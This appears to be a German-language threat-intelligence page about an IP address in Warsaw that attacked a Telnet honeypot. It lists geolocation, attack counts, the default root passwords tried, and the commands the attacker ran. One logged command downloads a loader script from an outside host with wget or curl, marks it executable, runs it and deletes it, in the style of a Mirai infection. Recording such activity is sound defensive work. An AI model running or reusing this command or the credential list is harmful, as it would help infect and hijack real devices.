TROYANOSYVIRUS
Aktive BedrohungMITTEL

92.118.205.122

Herkunftsland🇵🇱 Polonia
Erste Erkennung18.4.2026
Letzte Aktivitat18.4.2026
ISPBrainStorm Network, Inc
🎯
857
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
2
Malware

Geolokalisierung

Land
🇵🇱 Polonia
Stadt
Warsaw
ASN
AS136258
ISP
BrainStorm Network, Inc

Angriffsarten

ssh_telnet_honeypot

Angegriffene Ports

23

Zugehorige Malware

Versuchte Anmeldedaten

🔐root/password
50x
🔐root/root
48x
🔐root/admin
48x
🔐root/(leer)
47x

Ausgefuhrte Befehle

$cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget https://tg-xxooxx888.8964.mom/loader.sh -O .x 2>/dev/null || curl -s https://tg-xxooxx888.8964.mom/loader.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x48x
$echo mirai48x

Shodan InternetDB ExpositionShodan

InternetDB-Daten, nicht in Echtzeit

Ports
8080
CPEs
cpe:/a:f5:nginx

Risikobewertung

45
/100
NiedrigMittelHochKritisch